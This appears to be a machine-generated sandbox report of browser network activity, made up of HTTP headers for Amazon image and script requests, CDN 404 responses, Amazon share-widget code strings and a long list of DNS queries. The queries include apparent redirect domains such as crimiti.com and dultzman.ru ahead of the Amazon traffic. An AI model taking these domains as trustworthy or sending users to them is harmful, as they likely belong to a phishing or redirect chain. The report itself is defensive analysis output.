    Source: global trafficHTTP traffic detected: GET /images/I/41IU10DZeDL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81BY-cAOlCL._AC_QL10_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ii/1722546138571/inner-iframe.min.js HTTP/1.1Host: d1lxz4vuik53pc.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://d1lxz4vuik53pc.cloudfront.net/ii/1722546138571/inner.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/7c0c795f-4611-4e55-9ae6-d19245573000._CR0,0,600,100_AC_QL10_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71wHy1s3RbL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61fWN96Xa8L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61c-ZStR+kL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/d16g/kpw/transparent-1x1.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81BY-cAOlCL._AC_QL95_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41zL88vnT5L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61aTQubT0LL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81mZlEPiyrL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41qWHXXnEKL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/612U6nbJBCL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259736_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/perc/prime-logo.svg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: (function(h){var d=window.AmazonUIPageJS||window.P,r=d._namespace||d.attributeErrors,g=r?r("ShareWidgetTriggerAssets",""):d;g.guardFatal?g.guardFatal(h)(g,window):g.execute(function(){h(g,window)})})(function(h,d,r){h.now("tafShareOnNetwork").execute(function(d){"undefined"!==typeof d?h.log("tafShareOnNetwork is already registered","WARN","ShareWidgetTriggerAssets"):h.when("A","socialShareUtil").register("tafShareOnNetwork",function(c,a){var d={facebook:{shareEndpoint:"https://www.facebook.com/dialog/share", equals www.facebook.com (Facebook)
    Source: chromecache_1137.2.dr, chromecache_973.2.drString found in binary or memory: C=null,G={toolCreation:"SS",ad_unit_type:"Text",ad_unit_description:"SiteStripe Share on Media",destination_type:"1"===p?"ASIN":"Multiple",page_type:"1"===p?"Detail":"Gateway",served_ind:"N"},E={popoverLabel:a.social_share_header_link,header:a.social_share_header_link,activate:"onclick",width:530},z=function(){w.hide();u.hide();L.hide()},H={facebook:{server:"//www.facebook.com",template:"/share.php?u\x3d__FULLURL__"},twitter:{server:"https://twitter.com",template:"/intent/tweet?original_referer\x3d__FULLURL__\x26text\x3d__DESCRIPTION__\x26related\x3d__RELATEDACCOUNTS__\x26url\x3d__SHORTURL__\x26via\x3d__VIA__", equals www.facebook.com (Facebook)
    Source: chromecache_1137.2.dr, chromecache_973.2.drString found in binary or memory: C=null,G={toolCreation:"SS",ad_unit_type:"Text",ad_unit_description:"SiteStripe Share on Media",destination_type:"1"===p?"ASIN":"Multiple",page_type:"1"===p?"Detail":"Gateway",served_ind:"N"},E={popoverLabel:a.social_share_header_link,header:a.social_share_header_link,activate:"onclick",width:530},z=function(){w.hide();u.hide();L.hide()},H={facebook:{server:"//www.facebook.com",template:"/share.php?u\x3d__FULLURL__"},twitter:{server:"https://twitter.com",template:"/intent/tweet?original_referer\x3d__FULLURL__\x26text\x3d__DESCRIPTION__\x26related\x3d__RELATEDACCOUNTS__\x26url\x3d__SHORTURL__\x26via\x3d__VIA__", equals www.twitter.com (Twitter)
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: return"".concat(this.shareBaseUrl).concat(d).concat(b)}},fb:{label:"Facebook",name:"facebook",ref:"fa",shareBaseUrl:"https://www.facebook.com/dialog/share",image:"".concat("https://m.media-amazon.com/images/G/01/share-icons/","facebook-circular.svg"),imageSquared:"".concat("https://m.media-amazon.com/images/G/01/share-icons/","facebook-squared.svg"),canOpenInPopup:!0,getSharingUrl:function(b){b=encodeURIComponent(b||a.shareUrl.getReturnForChannel(this.ref));var d=encodeURIComponent(a.shareUrl.getReturnForChannel(this.ref).replace("_r_", equals www.facebook.com (Facebook)
    Source: global trafficDNS traffic detected: DNS query: guiltysociety.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: href.li
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: 7czh8.crimiti.com
    Source: global trafficDNS traffic detected: DNS query: ghd.dultzman.ru
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: images-eu.ssl-images-amazon.com
    Source: global trafficDNS traffic detected: DNS query: m.media-amazon.com
    Source: global trafficDNS traffic detected: DNS query: completion.amazon.com
    Source: global trafficDNS traffic detected: DNS query: fls-eu.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
    Source: global trafficDNS traffic detected: DNS query: unagi-eu.amazon.com
    Source: global trafficDNS traffic detected: DNS query: unagi-na.amazon.com
    Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: images-na.ssl-images-amazon.com
    Source: global trafficDNS traffic detected: DNS query: d1lxz4vuik53pc.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: aan.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: completion.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: d5glw3nnbe3pc.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: unagi.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: redirect.prod.experiment.routing.cloudfront.aws.a2z.com
    Source: global trafficDNS traffic detected: DNS query: a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: match.360yield.com
    Source: global trafficDNS traffic detected: DNS query: audex.userreport.com
    Source: global trafficDNS traffic detected: DNS query: rd.frontend.weborama.fr
    Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: rtb-csync.smartadserver.com
    Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
    Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: capi.connatix.com
    Source: global trafficDNS traffic detected: DNS query: amazon.partners.tremorhub.com
    Source: global trafficDNS traffic detected: DNS query: public-prod-dspcookiematching.dmxleo.com
    Source: global trafficDNS traffic detected: DNS query: ads.stickyadstv.com
    Source: global trafficDNS traffic detected: DNS query: sync.rfp.fout.jp
    Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: beacon.krxd.net
    Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
    Source: global trafficDNS traffic detected: DNS query: match.sharethrough.com
    Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
    Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
    Source: global trafficDNS traffic detected: DNS query: odr.mookie1.com
    Source: global trafficDNS traffic detected: DNS query: c1.adform.net
    Source: global trafficDNS traffic detected: DNS query: bs.serving-sys.com
    Source: global trafficDNS traffic detected: DNS query: cookie-matching.mediarithmics.com
    Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: usermatch.krxd.net
    Source: global trafficDNS traffic detected: DNS query: csync.loopme.me
    Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
    Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: lm.serving-sys.com
    Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
    Source: global trafficDNS traffic detected: DNS query: uipglob.semasio.net
    Source: global trafficDNS traffic detected: DNS query: crb.kargo.com
    Source: global trafficDNS traffic detected: DNS query: usersync.gumgum.com
    Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
    Source: global trafficDNS traffic detected: DNS query: loadus.exelator.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: uipus.semasio.net
    Source: global trafficDNS traffic detected: DNS query: sync-amazon.ads.yieldmo.com
    Source: global trafficDNS traffic detected: DNS query: sync.sxp.smartclip.net
    Source: global trafficDNS traffic detected: DNS query: image6.pubmatic.com
    Source: global trafficDNS traffic detected: DNS query: ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net
    Source: unknownHTTP traffic detected: POST /report/v4?s=qEJ3TWSfsmU0s7ynoHj90bDtQ6IVSQj3x35BkB4RjqYJDL4Two7Z4SKm9fVaj%2BMxhQBu8JIl1Zn%2FAnA5KBHEJaVSdbCKoZWUkPRrSsUP0dzF9WFFehABgtP%2FVTB9RA%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 428Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 18:28:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qEJ3TWSfsmU0s7ynoHj90bDtQ6IVSQj3x35BkB4RjqYJDL4Two7Z4SKm9fVaj%2BMxhQBu8JIl1Zn%2FAnA5KBHEJaVSdbCKoZWUkPRrSsUP0dzF9WFFehABgtP%2FVTB9RA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 7729Server: cloudflareCF-RAY: 8b6caf0fba394402-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Wed, 21 Aug 2024 18:29:02 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: RCS6DGBYFENM80DGSXAPContent-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/X-Content-Type-Options: nosniffAccept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionX-XSS-Protection: 1;Accept-CH-Lifetime: 86400content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Strict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 64f5a3ab7bfb476c633b87746aced0ee.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA56-P4Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: u7sGUwGzMeKHJd9h79raPepmxBxx19qFwTnN2s3xeHhKPp80Aizrvg==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Wed, 21 Aug 2024 18:29:05 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: FWEX6BYJXD49D9F5CV5RContent-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/X-Content-Type-Options: nosniffAccept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionX-XSS-Protection: 1;Strict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 ade2b5e2170ccd4f394b741b27bb0eec.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA56-P4Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: XLWEayNQagm4ElxW3J8gwvqABa7dAJrqH2NsGgcsR4PUpwZRtmoBzw==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:09 GMTContent-Length: 29Connection: closex-amz-rid: P5JMAQ7BKYSYJVE77RN4x-amzn-RequestId: d2f37074-7cb7-4847-90fa-5e72ea6cf9c8Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:09 GMTContent-Length: 29Connection: closex-amz-rid: 818F6464CR8H0QW3E15Wx-amzn-RequestId: bb645b7d-79ff-42a2-ba6b-356bf0bd22deVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:10 GMTContent-Length: 29Connection: closex-amz-rid: MCKCY6EVZT7ZHCDCDWBPx-amzn-RequestId: c9e98174-ec3a-4540-99db-10671803811cVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 21 Aug 2024 18:29:10 GMTContent-Length: 9Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Wed, 21 Aug 2024 18:29:24 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: 7VP58TCT3WAHKAQMZQR9content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400X-Content-Type-Options: nosniffAccept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionX-XSS-Protection: 1;Strict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 2c29bb35ddacc1dc2616fe65bdf5122e.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA56-P4Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: 96AXNwKpUAs2oBNL_RneSxqw0oztlbwv2a2WsyUsEdj3K77FCQZIGw==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:25 GMTContent-Length: 29Connection: closex-amz-rid: R3PE0YQZ48YBH2579EV7x-amzn-RequestId: cba48da2-a941-4702-8e93-8b2cf2e2088cVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:25 GMTContent-Length: 29Connection: closex-amz-rid: J133P540RVSGYMFVGGFBx-amzn-RequestId: 0dd97f22-339e-45ec-b63a-55399dfa68a0Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Wed, 21 Aug 2024 18:29:34 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: P6P99DP1W3ECEAZ4DXTHcontent-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400X-Content-Type-Options: nosniffContent-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionX-XSS-Protection: 1;Strict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 9987fa8ab620895e83d1d8f10c40f6d2.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA56-P4Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: nocemBFipIk2a8jRdn0iSBQ8HIbKRw7EM-r6af3lokzLFiQf4Db7ug==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:35 GMTContent-Length: 29Connection: closex-amz-rid: 1J36E33GSY81RWPH17QBx-amzn-RequestId: 6f21eb10-d846-4e30-b452-ee78c53a2132Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:44 GMTContent-Length: 29Connection: closex-amz-rid: 2RE8WY686T7GKVKFTYAEx-amzn-RequestId: 912e40e1-279a-4c47-8368-d36e0e80a814Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Wed, 21 Aug 2024 18:29:45 GMTContent-Length: 29Connection: closex-amz-rid: 2BRZ2638A7XB2WQ6JWPTx-amzn-RequestId: a86a4be3-84c6-4e51-8852-a8853ba5c9aaVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: http://amazon.com/
    Source: chromecache_746.2.dr, chromecache_1018.2.dr, chromecache_797.2.dr, chromecache_846.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: chromecache_746.2.dr, chromecache_1018.2.dr, chromecache_797.2.dr, chromecache_846.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: chromecache_746.2.dr, chromecache_1018.2.dr, chromecache_797.2.dr, chromecache_846.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
